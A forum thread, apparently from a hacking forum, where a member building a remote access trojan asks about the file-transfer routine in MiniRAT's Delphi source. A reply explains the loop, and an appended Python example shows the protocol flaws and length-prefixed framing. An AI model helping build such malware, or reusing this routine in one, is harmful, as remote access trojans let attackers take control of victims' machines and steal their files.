  1. #1 Member (Join Date: Mar 2007, Posts: 34)

    MiniRAT 0.5b Filetransfer explanation plz?

    I'm currently building a RAT of my own and got a lot of help from p0ke (his examples for winsock and MiniRAT).

    But I've got a problem with the filetransfer. In miniRAT the code goes something like this:

    The comments are mine, used to better describe the problem
    Code:
    { PInfo is a pointer to a record with the Name, Host and Port fields; it is defined elsewhere in MiniRAT }
    Function SendFile(P: Pointer): DWord; STDCALL;
    Var
      Sock          :TSocket;
      Addr          :TSockAddrIn;
      WSA           :TWSAData;
    
      BytesRead     :Cardinal;
    
      F             :File;
      Buf           :Array[0..8192] Of Char;
      dErr          :Integer;
    
      Name          :String;
      Host          :String;
      Port          :Integer;
    
      T             :String;
    Begin
      Name := PInfo(P)^.Name;
      Host := PInfo(P)^.Host;
      Port := PInfo(P)^.Port;
    
      WSAStartUp($0101, WSA);
        Sock := Socket(AF_INET, SOCK_STREAM, 0);
        Addr.sin_family := AF_INET;
        Addr.sin_port := hTons(Port);
        Addr.sin_addr.S_addr := inet_Addr(pchar(Host));
    
        If (connect(Sock, Addr, SizeOf(Addr)) <> 0) Then Exit;
    
        {$I-}
        T := 'ok';
        AssignFile(F, Name);
        Reset(F, 1);
        Repeat
          BlockRead(F, Buf, SizeOf(Buf), BytesRead);        { Problem 1 }
          If (BytesRead = 0) Then Break;
    
          Send(Sock, Buf[0], SizeOf(Buf), 0);
          FillChar(Buf, SizeOf(Buf), 0);                      { Problem 2 }
          Recv(Sock, Buf, SizeOf(Buf), 0);                    { Problem 3 }
        Until BytesRead = 0;
        CloseFile(F);
        {$I+}
    
      WSACleanUp();
    End;

    #Problem 1:
    I have no problem with this being done the first time but since it's repeated, I mean it's the same thing being done every time?

    #Problem 2:
    Why fill the buf with 0 when it's being sent?

    #Problem 3:
    Since the function sends a file, why should it receive data? Is it to keep track of what has been sent?


    Cheers to p0ke for this source <3

    Edit:
    I have read the Client-side and I can't get any sense even though I read this topic:
    http://opensc.ws/showthread.php?t=1215

  2. #2 Trilithium, Senior Member (Join Date: Jun 2006, Location: Planet Earth, Posts: 373)
    i personally refuse to use separate sockets for the same client (1 cmds & 1 for files) because you'll end up DoSing yourself

    Second thing (if you really want to use 2 sockets) : you do not have to use any reads or things like this as winsock2 directly gives you a function which is very efficient (no kernel/user mode swaps etc)

    look @ http://msdn2.microsoft.com/en-us/library/ms740565.aspx

    @Problem 1 : yes it looks just the same but the BlockRead Function internally pushes the file pointer forward so the whole file is sent

    @Problem 2 : No idea - it could be explained that he always sends the whole buffer (sizeof buffer) - this buf may be 5kb big but if just 1kb is left over to send/read, the space behind that 1kb is still filled with old data so the file might be corrupt. this is why u should ALWAYS USE A PROTOCOL - sending sequential data without any info can result in hours of debugging if errors occur
    Or this line is only used for Problem 3 because old data might result in protocol errors while reading (strings to pChar conversions [#0] etc)

    @Problem 3 : well to check if the file should still be sent etc?? you can respond to aborts if you want to

  3. #3 Member (Join Date: Mar 2007, Posts: 34)
    Quote Originally Posted by Trilithium View Post
    @Problem 1 : yes it looks just the same but the BlockRead Function internally pushes the file pointer forward so the whole file is sent

    @Problem 2 : No idea - it could be explained that he always sends the whole buffer (sizeof buffer) - this buf may be 5kb big but if just 1kb is left over to send/read, the space behind that 1kb is still filled with old data so the file might be corrupt. this is why u should ALWAYS USE A PROTOCOL - sending sequential data without any info can result in hours of debugging if errors occur
    Or this line is only used for Problem 3 because old data might result in protocol errors while reading (strings to pChar conversions [#0] etc)

    @Problem 3 : well to check if the file should still be sent etc?? you can respond to aborts if you want to
    @1: So it sends data from the new pointer? I mean, if you have 3 parts it sends part one, then points at part 2 and so on?

    @2: Since it sends data before the buf is zeroed it doesn't destroy anything?

    @3: Isn't it better just to send an integer? 1 for continue sending and 0 for Break; ??

  4. #4 Trilithium, Senior Member (Join Date: Jun 2006, Location: Planet Earth, Posts: 373)
    1 : nearly - in the end the "FILE" structure internally is a Windows file handle
    and also uses ReadFile etc - delphi just gives you an "easy" interface to those win32 api funcs

    so the pointer is an offset of a file on disk - it will read one BLOCK at a time whose size is determined by sizeof(buf) - if there is no more data, bytesread will be zero and the loop will exit

    2 yes

    3 depends - on a blocking socket the recv func waits until data (or errors) occur so if you do not respond (server) each time a packet has been sent the loop will wait for ever ^^ so you might want to use a non blocking server

    i hope this was right :cool:
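The two points raised in this thread (padding sent past the last BytesRead when the whole buffer goes out, and a blocking Recv that never returns when the other side stays silent) can be reproduced without any network. The following is an added Python example, not code from the thread or from MiniRAT: it runs both ends over a local socket pair, mirrors the posted loop in naive_send, and puts a length-prefixed, acknowledged framing with an ack timeout beside it. Every name in it (CHUNK, PAYLOAD, naive_send, framed_send, run_transfer, and so on) is the example's own, and PAYLOAD is a constructed sample chosen so that the last read is shorter than the buffer.

```python
import socket
import struct
import threading

CHUNK = 8192  # plays the role of SizeOf(Buf) in the Delphi loop

# Constructed sample payload: not a multiple of CHUNK, so the final read is short.
PAYLOAD = bytes(range(256)) * 40 + b"tail"   # 10244 bytes


def naive_send(sock: socket.socket, data: bytes) -> None:
    """Mirror the posted loop: zero the buffer, copy what was read,
    then send SizeOf(Buf) bytes no matter how many were actually read."""
    for off in range(0, len(data), CHUNK):
        buf = bytearray(CHUNK)                 # FillChar(Buf, SizeOf(Buf), 0)
        piece = data[off:off + CHUNK]          # BlockRead(F, Buf, SizeOf(Buf), BytesRead)
        buf[:len(piece)] = piece
        sock.sendall(bytes(buf))               # Send(Sock, Buf[0], SizeOf(Buf), 0)
    sock.shutdown(socket.SHUT_WR)              # a raw stream can only signal "done" by closing


def naive_recv(sock: socket.socket) -> bytes:
    """Receiver with no framing: all it can do is append until the peer closes."""
    out = bytearray()
    while True:
        part = sock.recv(CHUNK)
        if not part:
            return bytes(out)
        out += part


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """TCP is a byte stream; one recv may return fewer bytes than asked for."""
    out = bytearray()
    while len(out) < n:
        part = sock.recv(n - len(out))
        if not part:
            raise ConnectionError("peer closed in the middle of a frame")
        out += part
    return bytes(out)


def framed_send(sock: socket.socket, data: bytes, ack_timeout: float = 0.5) -> None:
    """Length-prefixed frames, each acknowledged before the next is sent.
    The timeout turns 'recv waits forever' into an exception the caller can handle."""
    sock.settimeout(ack_timeout)
    for off in range(0, len(data), CHUNK):
        piece = data[off:off + CHUNK]
        sock.sendall(struct.pack("!I", len(piece)) + piece)   # send only what was read
        if recv_exact(sock, 1) != b"\x01":
            raise ConnectionError("receiver aborted the transfer")
    sock.sendall(struct.pack("!I", 0))                          # zero-length frame = end of file


def framed_recv(sock: socket.socket) -> bytes:
    """Receiver that trusts the length prefix, never the buffer size."""
    out = bytearray()
    while True:
        (n,) = struct.unpack("!I", recv_exact(sock, 4))
        if n == 0:
            return bytes(out)
        out += recv_exact(sock, n)
        sock.sendall(b"\x01")          # ack; any other byte tells the sender to stop


def silent_recv(sock: socket.socket) -> bytes:
    """Misbehaving peer: reads the first frame and never answers."""
    (n,) = struct.unpack("!I", recv_exact(sock, 4))
    recv_exact(sock, n)
    return b""


def run_transfer(sender, receiver, data: bytes) -> bytes:
    """Drive a sender and a receiver over a loopback socket pair; return what arrived."""
    a, b = socket.socketpair()
    result = {}
    t = threading.Thread(target=lambda: result.update(data=receiver(b)))
    t.start()
    try:
        sender(a, data)
    finally:
        t.join()
        a.close()
        b.close()
    return result.get("data")


def ack_timeout_detected() -> bool:
    """Problem 3 in miniature: the sender waits on recv for an ack that never comes.
    With a timeout set it fails fast instead of hanging the loop forever."""
    try:
        run_transfer(framed_send, silent_recv, PAYLOAD)
    except socket.timeout:
        return True
    return False


if __name__ == "__main__":
    got = run_transfer(naive_send, naive_recv, PAYLOAD)
    print("naive:  sent %d bytes, receiver got %d, intact=%s"
          % (len(PAYLOAD), len(got), got == PAYLOAD))
    got = run_transfer(framed_send, framed_recv, PAYLOAD)
    print("framed: receiver got %d bytes, intact=%s" % (len(got), got == PAYLOAD))
    print("ack timeout detected:", ack_timeout_detected())
```

The naive pair delivers 16384 bytes for a 10244-byte payload: the zeroing in FillChar only decides whether the padding is zeros or stale data, it does not stop the padding from being sent, which is the corruption Trilithium describes. The framed pair delivers exactly the payload because the receiver reads the length prefix and stops there, and the acknowledgement wait is bounded by settimeout, so a peer that goes quiet produces an exception rather than a thread stuck in Recv.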
